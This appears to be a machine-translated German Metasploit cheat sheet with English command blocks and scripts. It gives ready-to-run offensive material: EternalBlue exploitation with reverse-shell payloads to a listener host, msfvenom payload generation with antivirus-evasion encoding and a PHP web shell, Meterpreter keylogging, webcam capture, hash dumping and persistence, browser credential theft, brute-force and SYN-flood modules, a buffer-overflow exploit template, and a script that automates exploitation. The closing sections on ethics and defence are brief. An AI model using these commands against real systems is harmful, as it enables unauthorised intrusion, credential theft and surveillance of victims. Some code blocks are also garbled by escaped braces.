Metasploit Cheat Sheet¶
Überblick¶
Metasploit ist das weltweit am weitesten verbreitete Penetrationstest-Framework, das eine umfassende Plattform für die Entwicklung, Prüfung und Ausführung von Exploit Code gegen entfernte Zielsysteme bietet. Ursprünglich von H.D. Moore erstellt und nun von Rapid7 aufrechterhalten, hat sich Metasploit in den de facto-Standard für Penetrationstests und Sicherheitsbewertung entwickelt, bietet eine umfangreiche Sammlung von Exploits, Nutzlasten, Encodern und Hilfsmodulen, die Sicherheitsexperten ermöglichen, Sicherheitslücken in verschiedenen Rechenumgebungen zu identifizieren, zu validieren und zu demonstrieren. Die modulare Architektur und umfangreiche Datenbank bekannter Exploits machen es zu einem unverzichtbaren Werkzeug für ethische Hacker, Sicherheitsforscher und Penetrationstester weltweit.
Die Kernkraft von Metasploit liegt in seinen umfassenden Entwicklungs- und Bereitstellungsfunktionen, die ein umfangreiches Repository bewährter Exploits mit ausgereiften Nutzlasterzeugungs- und Liefermechanismen kombinieren. Der Rahmen umfasst Tausende von Exploits, die auf verschiedene Betriebssysteme, Anwendungen und Netzwerkdienste abzielen, sowie Hunderte von Nutzlasten, die von einfachen Befehlsschalen bis hin zu fortschrittlichen persistenten Zugriffsmechanismen reichen. Die intelligenten Zielerkennungs- und Auswahlmöglichkeiten von Metasploit ermöglichen automatisierte Sicherheitsbewertungs-Workflows, während die fortschrittlichen Evasionstechniken und Kodierungsoptionen dazu beitragen, moderne Sicherheitskontrollen und Antivirensysteme zu umgehen.
Zu den unternehmenseigenen Features von Metasploit gehören verteilte Testfunktionen, umfassende Reporting- und Dokumentationstools, die Integration mit Schwachstellenscannern und Sicherheitsinformationssystemen sowie umfangreiche Anpassungsmöglichkeiten für spezialisierte Testszenarien. Das Framework unterstützt mehrere Schnittstellen, darunter Befehlszeilen, webbasierte und API-Zugriffe, wodurch die Integration mit automatisierten Sicherheitstest-Pipelines und benutzerdefinierten Sicherheitstools ermöglicht wird. Mit seiner aktiven Entwicklungsgemeinschaft, regelmäßigen Updates mit den neuesten Schwachstellen und Exploits, und bewährten Erfolgsbilanzen bei professionellen Sicherheitsbewertungen, bleibt Metasploit der Grundstein für Penetrationstests und Sicherheitsvalidierung in allen Größen.
Installation¶
Ubuntu/Debian Installation¶
Installieren von Metasploit auf Ubuntu/Debian Systemen:
```bash
Update system packages¶
sudo apt update && sudo apt upgrade -y
Install dependencies¶
sudo apt install -y curl wget gnupg2 software-properties-common
Add Rapid7 repository¶
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall
Alternative: Install from package¶
wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run chmod +x metasploit-latest-linux-x64-installer.run sudo ./metasploit-latest-linux-x64-installer.run
Install from source (development version)¶
sudo apt install -y git ruby ruby-dev build-essential zlib1g-dev \ libreadline-dev libssl-dev libpq-dev sqlite3 libsqlite3-dev \ libpcap-dev autoconf postgresql postgresql-contrib
Clone repository¶
git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework
Install Ruby dependencies¶
gem install bundler bundle install
Initialize database¶
sudo systemctl start postgresql sudo systemctl enable postgresql sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Configure database¶
cat > config/database.yml << 'EOF' production: adapter: postgresql database: msf_database username: msf password: host: localhost port: 5432 pool: 5 timeout: 5 EOF
Initialize Metasploit database¶
./msfconsole -q -x "db_status; exit"
Verify installation¶
msfconsole --version ```_
CentOS/RHEL Installation¶
```bash
Install EPEL repository¶
sudo yum install -y epel-release
Install dependencies¶
sudo yum install -y curl wget git ruby ruby-devel gcc gcc-c++ \ make autoconf readline-devel openssl-devel zlib-devel \ postgresql postgresql-server postgresql-contrib
Initialize PostgreSQL¶
sudo postgresql-setup initdb sudo systemctl start postgresql sudo systemctl enable postgresql
Install Metasploit¶
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall
Configure database¶
sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Verify installation¶
msfconsole --version ```_
macOS Installation¶
```bash
Install using Homebrew¶
brew install metasploit
Install dependencies¶
brew install postgresql brew services start postgresql
Create database¶
createuser -s msf createdb msf_database
Alternative: Install from installer¶
Download from https://www.metasploit.com/download¶
Run installer package¶
Verify installation¶
msfconsole --version ```_
Windows Installation¶
```bash
Download Windows installer¶
https://www.metasploit.com/download¶
Run installer as Administrator¶
Follow installation wizard¶
Install PostgreSQL¶
Download from https://www.postgresql.org/download/windows/¶
Configure database during installation¶
Verify installation¶
Open Command Prompt or PowerShell¶
msfconsole --version
Alternative: Install with Chocolatey¶
choco install metasploit
Configure Windows Defender exclusions¶
Add Metasploit installation directory to exclusions¶
```_
Docker Installation¶
Metasploit in Docker:
```bash
Pull official Metasploit image¶
docker pull metasploitframework/metasploit-framework
Run Metasploit console¶
docker run --rm -it metasploitframework/metasploit-framework
Run with persistent data¶
docker run --rm -it \ -v $(pwd)/msf_data:/home/msf/.msf4 \ metasploitframework/metasploit-framework
Create custom Dockerfile¶
cat > Dockerfile.metasploit << 'EOF' FROM metasploitframework/metasploit-framework
Install additional tools¶
USER root RUN apt-get update && apt-get install -y \ nmap \ nikto \ sqlmap \ && rm -rf /var/lib/apt/lists/*
Switch back to msf user¶
USER msf
Set working directory¶
WORKDIR /home/msf
CMD ["msfconsole"] EOF
Build custom image¶
docker build -f Dockerfile.metasploit -t metasploit-custom .
Run with network access¶
docker run --rm -it --net=host metasploit-custom ```_
Basisnutzung¶
Metasploit Console¶
Erste Schritte mit msfconsole:
```bash
Start Metasploit console¶
msfconsole
Basic commands¶
help # Show help version # Show version information exit # Exit console
Database commands¶
db_status # Check database connection db_connect # Connect to database db_disconnect # Disconnect from database db_rebuild_cache # Rebuild module cache
Workspace management¶
workspace # List workspaces workspace -a test # Add workspace workspace test # Switch to workspace workspace -d test # Delete workspace
Module management¶
show exploits # List all exploits show payloads # List all payloads show auxiliary # List auxiliary modules show post # List post-exploitation modules show encoders # List encoders show nops # List NOP generators
Search modules¶
search type:exploit platform:windows search cve:2017 search ms17-010 search apache ```_
Zielentdeckung¶
Ziele entdecken und scannen:
```bash
Network discovery with auxiliary modules¶
use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 run
Port scanning¶
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.100 set PORTS 1-1000 run
Service identification¶
use auxiliary/scanner/http/http_version set RHOSTS 192.168.1.100 run
SMB scanning¶
use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.0/24 run
Database services¶
use auxiliary/scanner/mysql/mysql_version set RHOSTS 192.168.1.100 run
Web application scanning¶
use auxiliary/scanner/http/dir_scanner set RHOSTS 192.168.1.100 set DICTIONARY /usr/share/wordlists/dirb/common.txt run
Vulnerability scanning¶
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run
Save scan results¶
db_nmap -sS -O 192.168.1.0/24 hosts # View discovered hosts services # View discovered services vulns # View discovered vulnerabilities ```_
Exploitation¶
Grundausbeutung Workflow:
```bash
Select exploit module¶
use exploit/windows/smb/ms17_010_eternalblue show options # Display required options show targets # Display available targets show payloads # Display compatible payloads
Configure exploit¶
set RHOSTS 192.168.1.100 set RPORT 445 set TARGET 0
Select payload¶
set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 set LPORT 4444
Verify configuration¶
show options check # Check if target is vulnerable
Execute exploit¶
exploit
or¶
run
Alternative: Use exploit command directly¶
exploit -j # Run as job exploit -z # Don't interact with session
Session management¶
sessions # List active sessions sessions -i 1 # Interact with session 1 sessions -k 1 # Kill session 1 sessions -K # Kill all sessions ```_
Nutzlasterzeugung¶
Generieren von eigenständigen Nutzlasten:
```bash
Generate Windows executable¶
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f exe -o payload.exe
Generate Linux executable¶
msfvenom -p linux/x86/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f elf -o payload.elf
Generate PHP web shell¶
msfvenom -p php/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f raw -o shell.php
Generate PowerShell payload¶
msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f psh -o payload.ps1
Generate Android APK¶
msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -o payload.apk
Encoded payloads (AV evasion)¶
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -e x86/shikata_ga_nai -i 3 \ -f exe -o encoded_payload.exe
List available formats¶
msfvenom --list formats
List available encoders¶
msfvenom --list encoders
List available payloads¶
msfvenom --list payloads ```_
Erweiterte Funktionen¶
Meterpreter¶
Advanced Meterpreter Nutzung:
```bash
Basic Meterpreter commands¶
sysinfo # System information getuid # Current user getpid # Current process ID ps # Process list pwd # Current directory ls # List files cd /path # Change directory
File operations¶
download file.txt # Download file upload file.txt # Upload file edit file.txt # Edit file cat file.txt # Display file content rm file.txt # Delete file mkdir newdir # Create directory
System operations¶
shell # Drop to system shell execute -f cmd.exe -i # Execute command interactively migrate 1234 # Migrate to process ID 1234 kill 1234 # Kill process ID 1234 reboot # Reboot system shutdown # Shutdown system
Network operations¶
netstat # Network connections route # Routing table arp # ARP table portfwd add -l 8080 -p 80 -r 192.168.1.100 # Port forwarding
Privilege escalation¶
getsystem # Attempt privilege escalation getprivs # Get current privileges
Persistence¶
run persistence -X -i 10 -p 4444 -r 192.168.1.50
Information gathering¶
hashdump # Dump password hashes screenshot # Take screenshot webcam_snap # Take webcam photo record_mic # Record microphone keyscan_start # Start keylogger keyscan_dump # Dump keystrokes keyscan_stop # Stop keylogger
Registry operations (Windows)¶
reg queryval -k HKLM\Software\Microsoft\Windows\CurrentVersion -v ProductName reg setval -k HKLM\Software\Test -v TestValue -t REG_SZ -d "Test Data" reg deleteval -k HKLM\Software\Test -v TestValue
Background session¶
background # Background current session ```_
Post-Exploitation¶
Post-Exploitationsmodule:
```bash
Load post-exploitation module¶
use post/windows/gather/hashdump set SESSION 1 run
System information gathering¶
use post/windows/gather/enum_system use post/linux/gather/enum_system use post/osx/gather/enum_osx
Network enumeration¶
use post/windows/gather/enum_domain use post/windows/gather/enum_shares use post/multi/gather/enum_network
Credential harvesting¶
use post/windows/gather/credentials/windows_autologin use post/windows/gather/smart_hashdump use post/linux/gather/hashdump
Privilege escalation¶
use post/windows/escalate/getsystem use post/linux/escalate/cve_2021_4034
Persistence mechanisms¶
use post/windows/manage/persistence_exe use post/linux/manage/sshkey_persistence
Data exfiltration¶
use post/windows/gather/enum_files use post/multi/gather/firefox_creds use post/multi/gather/chrome_cookies
Lateral movement¶
use post/windows/gather/enum_domain_users use post/windows/gather/enum_computers ```_
Zusatzmodule¶
Einsatz von Hilfsmodulen für verschiedene Aufgaben:
```bash
Brute force attacks¶
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.1.100 set USER_FILE users.txt set PASS_FILE passwords.txt run
FTP brute force¶
use auxiliary/scanner/ftp/ftp_login set RHOSTS 192.168.1.100 set USERNAME admin set PASS_FILE passwords.txt run
HTTP brute force¶
use auxiliary/scanner/http/http_login set RHOSTS 192.168.1.100 set AUTH_URI /admin/login set USERNAME admin set PASS_FILE passwords.txt run
Database attacks¶
use auxiliary/scanner/mysql/mysql_login use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/postgres/postgres_login
Denial of service¶
use auxiliary/dos/tcp/synflood set RHOST 192.168.1.100 run
Information gathering¶
use auxiliary/gather/shodan_search set SHODAN_APIKEY your_api_key set QUERY "apache" run
Fuzzing¶
use auxiliary/fuzzers/http/http_form_field set RHOSTS 192.168.1.100 set URI /login.php run
SNMP enumeration¶
use auxiliary/scanner/snmp/snmp_enum set RHOSTS 192.168.1.0/24 run ```_
Benutzerdefinierte Module¶
Benutzerdefinierte erstellen Metasploit Module:
```ruby
Custom auxiliary module template¶
Save as ~/.msf4/modules/auxiliary/scanner/custom/my_scanner.rb¶
require 'msf/core'
class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Custom Scanner Module', 'Description' => 'Custom scanner for demonstration', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://example.com'] ], 'DisclosureDate' => '2023-01-01' ))
register_options([
Opt::RPORT(80),
OptString.new('URI', [true, 'URI to scan', '/']),
OptString.new('KEYWORD', [true, 'Keyword to search for', 'admin'])
])
end
def run_host(target_host) begin connect
request = "GET #\\\\{datastore['URI']\\\\} HTTP/1.1\r\n"
request << "Host: #\\\\{target_host\\\\}\r\n"
request << "Connection: close\r\n\r\n"
sock.put(request)
response = sock.recv(1024)
if response.include?(datastore['KEYWORD'])
print_good("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Found keyword: #\\\\{datastore['KEYWORD']\\\\}")
report_note(
host: target_host,
port: rport,
proto: 'tcp',
type: 'custom_scan',
data: "Keyword '#\\\\{datastore['KEYWORD']\\\\}' found"
)
else
print_status("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Keyword not found")
end
rescue ::Exception => e
print_error("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Error: #\\\\{e.message\\\\}")
ensure
disconnect
end
end
end
_ruby
Custom exploit module template¶
Save as ~/.msf4/modules/exploits/custom/my_exploit.rb¶
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Custom Exploit Module', 'Description' => 'Custom exploit for demonstration', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-0001'], ['URL', 'http://example.com'] ], 'Platform' => 'linux', 'Targets' => [ ['Linux x86', \\{ 'Ret' => 0x08048484 \\}] ], 'Payload' => \\{ 'Space' => 400, 'BadChars' => "\x00\x0a\x0d\x20" \\}, 'DisclosureDate' => '2023-01-01', 'DefaultTarget' => 0 ))
register_options([
Opt::RPORT(9999),
OptString.new('COMMAND', [true, 'Command to execute', 'id'])
])
end
def check begin connect sock.put("TEST\n") response = sock.recv(1024) disconnect
if response.include?("VULNERABLE")
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
rescue
return Exploit::CheckCode::Unknown
end
end
def exploit begin connect
buffer = "A" * 260
buffer << [target.ret].pack('V')
buffer << payload.encoded
print_status("Sending exploit buffer...")
sock.put(buffer)
handler
disconnect
rescue ::Exception => e
print_error("Exploit failed: #\\\\{e.message\\\\}")
end
end end ```_
Automatisierungsskripte¶
Automatisierte Penetration Testing Script¶
```python
!/usr/bin/env python3¶
Automated penetration testing with Metasploit¶
import subprocess import json import time import sys import os import argparse from datetime import datetime
class MetasploitAutomator: def init(self, msf_path="msfconsole"): self.msf_path = msf_path self.workspace = f"auto_test_\\{int(time.time())\\}" self.results = \\{\\}
def execute_msf_command(self, commands, timeout=300):
"""Execute Metasploit commands"""
if isinstance(commands, str):
commands = [commands]
# Create resource file
resource_file = f"/tmp/msf_commands_\\\\{int(time.time())\\\\}.rc"
with open(resource_file, 'w') as f:
for cmd in commands:
f.write(f"\\\\{cmd\\\\}\n")
f.write("exit\n")
try:
# Execute Metasploit with resource file
result = subprocess.run([
self.msf_path, "-q", "-r", resource_file
], capture_output=True, text=True, timeout=timeout)
# Clean up
os.remove(resource_file)
return result.stdout, result.stderr, result.returncode
except subprocess.TimeoutExpired:
print(f"Command timed out after \\\\{timeout\\\\} seconds")
return "", "Timeout", 1
except Exception as e:
print(f"Error executing command: \\\\{e\\\\}")
return "", str(e), 1
def setup_workspace(self):
"""Setup Metasploit workspace"""
commands = [
"db_status",
f"workspace -a \\\\{self.workspace\\\\}",
f"workspace \\\\{self.workspace\\\\}"
]
stdout, stderr, returncode = self.execute_msf_command(commands)
if returncode == 0:
print(f"Workspace '\\\\{self.workspace\\\\}' created successfully")
return True
else:
print(f"Failed to create workspace: \\\\{stderr\\\\}")
return False
def network_discovery(self, target_range):
"""Perform network discovery"""
print(f"Starting network discovery for \\\\{target_range\\\\}")
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"db_nmap -sn \\\\{target_range\\\\}",
"hosts -c address,name,os_name,purpose",
"services -c port,proto,name,state"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=600)
if returncode == 0:
print("Network discovery completed")
self.results['discovery'] = stdout
return True
else:
print(f"Network discovery failed: \\\\{stderr\\\\}")
return False
def vulnerability_scan(self, targets):
"""Perform vulnerability scanning"""
print(f"Starting vulnerability scan for \\\\{targets\\\\}")
scan_modules = [
"auxiliary/scanner/smb/smb_ms17_010",
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/ssh/ssh_version",
"auxiliary/scanner/ftp/ftp_version",
"auxiliary/scanner/mysql/mysql_version"
]
commands = [f"workspace \\\\{self.workspace\\\\}"]
for module in scan_modules:
commands.extend([
f"use \\\\{module\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
"run",
"back"
])
commands.append("vulns")
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=1200)
if returncode == 0:
print("Vulnerability scan completed")
self.results['vulnerabilities'] = stdout
return True
else:
print(f"Vulnerability scan failed: \\\\{stderr\\\\}")
return False
def automated_exploitation(self, targets):
"""Perform automated exploitation"""
print(f"Starting automated exploitation for \\\\{targets\\\\}")
# Common exploits to try
exploits = [
\\\\{
'module': 'exploit/windows/smb/ms17_010_eternalblue',
'payload': 'windows/x64/meterpreter/reverse_tcp',
'port': 445
\\\\},
\\\\{
'module': 'exploit/linux/ssh/ssh_login',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 22
\\\\},
\\\\{
'module': 'exploit/multi/http/apache_struts2_content_type_ognl',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 80
\\\\}
]
successful_exploits = []
for exploit in exploits:
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"use \\\\{exploit['module']\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
f"set RPORT \\\\{exploit['port']\\\\}",
f"set PAYLOAD \\\\{exploit['payload']\\\\}",
"set LHOST 0.0.0.0", # Auto-detect
"set LPORT 4444",
"check",
"exploit -j", # Run as job
"sleep 10",
"sessions -l"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if "session" in stdout.lower() and "opened" in stdout.lower():
print(f"Successful exploitation with \\\\{exploit['module']\\\\}")
successful_exploits.append(exploit)
else:
print(f"Exploitation failed with \\\\{exploit['module']\\\\}")
self.results['exploits'] = successful_exploits
return len(successful_exploits) > 0
def post_exploitation(self):
"""Perform post-exploitation activities"""
print("Starting post-exploitation activities")
commands = [
f"workspace \\\\{self.workspace\\\\}",
"sessions -l",
"sessions -i 1", # Interact with first session
"sysinfo",
"getuid",
"ps",
"hashdump",
"background"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if returncode == 0:
print("Post-exploitation completed")
self.results['post_exploitation'] = stdout
return True
else:
print(f"Post-exploitation failed: \\\\{stderr\\\\}")
return False
def generate_report(self, output_file="metasploit_report.html"):
"""Generate comprehensive report"""
html_content = f"""
Metasploit Automated Penetration Test Report
Generated: \\\\{datetime.now().isoformat()\\\\}
Workspace: \\\\{self.workspace\\\\}
Executive Summary
- Successful Exploits: \\\\{len(self.results.get('exploits', []))\\\\}
- Vulnerabilities Found: \\\\{self.count_vulnerabilities()\\\\}
- Hosts Discovered: \\\\{self.count_hosts()\\\\}
Network Discovery Results
\\\\{self.results.get('discovery', 'No discovery data available')\\\\}
Successful Exploits
| Module | Payload | Port |
|---|---|---|
| \\\\{exploit['module']\\\\} | \\\\{exploit['payload']\\\\} | \\\\{exploit['port']\\\\} |
Vulnerability Scan Results
\\\\{\\\\}
Post-Exploitation Results
\\\\{\\\\}
Recommendations
- Patch all identified vulnerabilities immediately
- Implement network segmentation
- Deploy endpoint detection and response (EDR) solutions
- Conduct regular security assessments
- Implement multi-factor authentication
- Monitor network traffic for suspicious activities
""".format( self.results.get('vulnerabilities', 'No vulnerability data available'), self.results.get('post_exploitation', 'No post-exploitation data available') )
with open(output_file, 'w') as f:
f.write(html_content)
print(f"Report generated: \\\\{output_file\\\\}")
return output_file
def count_vulnerabilities(self):
"""Count vulnerabilities from scan results"""
vuln_data = self.results.get('vulnerabilities', '')
return vuln_data.count('Vulnerable') + vuln_data.count('VULNERABLE')
def count_hosts(self):
"""Count discovered hosts"""
discovery_data = self.results.get('discovery', '')
return discovery_data.count('address')
def cleanup(self):
"""Clean up workspace and sessions"""
commands = [
"sessions -K", # Kill all sessions
f"workspace -d \\\\{self.workspace\\\\}"
]
self.execute_msf_command(commands)
print("Cleanup completed")
def run_full_assessment(self, target_range, output_dir="/tmp/metasploit_assessment"):
"""Run complete automated assessment"""
print("Starting automated Metasploit assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
try:
# Setup workspace
if not self.setup_workspace():
return False
# Network discovery
if not self.network_discovery(target_range):
return False
# Vulnerability scanning
if not self.vulnerability_scan(target_range):
return False
# Automated exploitation
self.automated_exploitation(target_range)
# Post-exploitation
self.post_exploitation()
# Generate report
report_file = os.path.join(output_dir, "metasploit_report.html")
self.generate_report(report_file)
print("Automated assessment completed successfully")
return True
except Exception as e:
print(f"Assessment failed: \\\\{e\\\\}")
return False
finally:
self.cleanup()
def main(): parser = argparse.ArgumentParser(description='Metasploit Automation') parser.add_argument('--target', required=True, help='Target range (e.g., 192.168.1.0/24)') parser.add_argument('--output', default='/tmp/metasploit_assessment', help='Output directory') parser.add_argument('--msf-path', default='msfconsole', help='Path to msfconsole')
args = parser.parse_args()
# Initialize automator
automator = MetasploitAutomator(args.msf_path)
# Run assessment
success = automator.run_full_assessment(args.target, args.output)
if success:
print("Assessment completed successfully")
else:
print("Assessment failed")
sys.exit(1)
if name == "main": main() ```_
Integrationsbeispiele¶
CI/CD Integration¶
```yaml
Jenkins Pipeline for Metasploit Integration¶
pipeline \\{ agent \\{ label 'security-testing' \\}
environment \\\\{
MSF_DATABASE_URL = 'postgresql: //msf:password@localhost/msf_database'
TARGET_NETWORK = '192.168.100.0/24'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Start PostgreSQL and initialize Metasploit
sh '''
sudo systemctl start postgresql
msfdb init
msfconsole -q -x "db_status; exit"
'''
\\\\}
\\\\}
\\\\}
stage('Network Discovery') \\\\{
steps \\\\{
script \\\\{
// Perform network discovery
sh '''
cat > discovery.rc << 'EOF'
workspace -a jenkins_test db_nmap -sn $\\{TARGET_NETWORK\\} hosts -o hosts.xml exit EOF msfconsole -q -r discovery.rc ''' \\} \\} \\}
stage('Vulnerability Assessment') \\\\{
steps \\\\{
script \\\\{
// Run vulnerability scans
sh '''
cat > vuln_scan.rc << 'EOF'
workspace jenkins_test use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS $\\{TARGET_NETWORK\\} run vulns -o vulns.xml exit EOF msfconsole -q -r vuln_scan.rc ''' \\} \\} \\}
stage('Generate Report') \\\\{
steps \\\\{
script \\\\{
// Generate security report
sh '''
python3 generate_msf_report.py \
--hosts hosts.xml \
--vulns vulns.xml \
--output security_report.html
'''
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Archive results
archiveArtifacts artifacts: '*.xml,*.html', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: '.',
reportFiles: 'security_report.html',
reportName: 'Security Assessment Report'
])
// Clean up
sh '''
msfconsole -q -x "workspace -d jenkins_test; exit"
rm -f *.rc *.xml
'''
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "Security Assessment Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "Security assessment failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\} ```_
Fehlerbehebung¶
Gemeinsame Themen¶
** Probleme der Datenbankverbindung:** ```bash
Check database status¶
msfconsole -q -x "db_status; exit"
Reinitialize database¶
msfdb delete msfdb init
Manual database setup¶
sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Configure database connection¶
cat > ~/.msf4/database.yml << 'EOF' production: adapter: postgresql database: msf_database username: msf password: host: localhost port: 5432 pool: 5 timeout: 5 EOF ```_
Modul Belastungsprobleme: ```bash
Reload modules¶
msfconsole -q -x "reload_all; exit"
Check module paths¶
msfconsole -q -x "show advanced; exit"|grep ModulePath
Update Metasploit¶
msfupdate
Clear module cache¶
rm -rf ~/.msf4/store/modules_metadata.json ```_
Payload Generation Issues: ```bash
Check available encoders¶
msfvenom --list encoders
Test payload generation¶
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=127.0.0.1 LPORT=4444 \ -f exe --platform windows -a x86 \ -o test_payload.exe
Debug payload issues¶
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=127.0.0.1 LPORT=4444 \ -f raw|hexdump -C ```_
Leistungsoptimierung¶
Optimierung der Metasploit-Performance:
```bash
Database optimization¶
Edit postgresql.conf¶
sudo nano /etc/postgresql/*/main/postgresql.conf
Increase shared_buffers¶
shared_buffers = 256MB
Increase work_mem¶
work_mem = 4MB
Restart PostgreSQL¶
sudo systemctl restart postgresql
Metasploit optimization¶
Increase Ruby memory limit¶
export RUBY_HEAP_MIN_SLOTS=800000 export RUBY_HEAP_SLOTS_INCREMENT=300000 export RUBY_HEAP_SLOTS_GROWTH_FACTOR=1 export RUBY_GC_MALLOC_LIMIT=79000000
Start Metasploit with optimizations¶
msfconsole ```_
Sicherheitsüberlegungen¶
Operationelle Sicherheit¶
Legal und Ethische Nutzung: - Verwenden Sie Metasploit nur gegen Systeme, die Sie besitzen oder haben ausdrückliche Erlaubnis zu testen - Rechtliche Anforderungen an Penetrationstests in Ihrer Gerichtsbarkeit verstehen - Durchführung ordnungsgemäßer Berechtigungs- und Dokumentationsverfahren - Einschränkungen des Umfangs und Regeln des Engagements - Vertraulichkeit der entdeckten Schwachstellen bewahren
Datenschutz: - Verschlüsseln Sie Metasploit Datenbanken mit sensiblen Informationen - Umsetzung sicherer Datenschutzbestimmungen für Bewertungsergebnisse - Kontrolle des Zugriffs auf Ausbeutungswerkzeuge und Ergebnisse - Sichere Übermittlung von Bewertungsberichten und Erkenntnissen - Regelmäßige Reinigung von temporären Dateien und Sitzungsdaten
Defensive Überlegungen¶
** Erkennung und Prävention:** - Monitor für Metasploit Signaturen und Kompromissindikatoren - Implementierung von Netzwerk-Erkennungssystemen - Bereitstellung von Endpoint-Erkennungs- und Antwortlösungen - Regelmäßige Sicherheitsbewertungen und Sicherheitsmanagement - Sicherheitsbewusstseinstraining für Entwicklungs- und Betriebsteams
Referenzen¶
- Metasploit Offizielle Dokumentation
- Metasploit GitHub Repository
- [Metasploit Unleashed Course](https://LINK_5_
- [Rapid7 Vulnerability Database](LINK_5_
- (LINK_5_)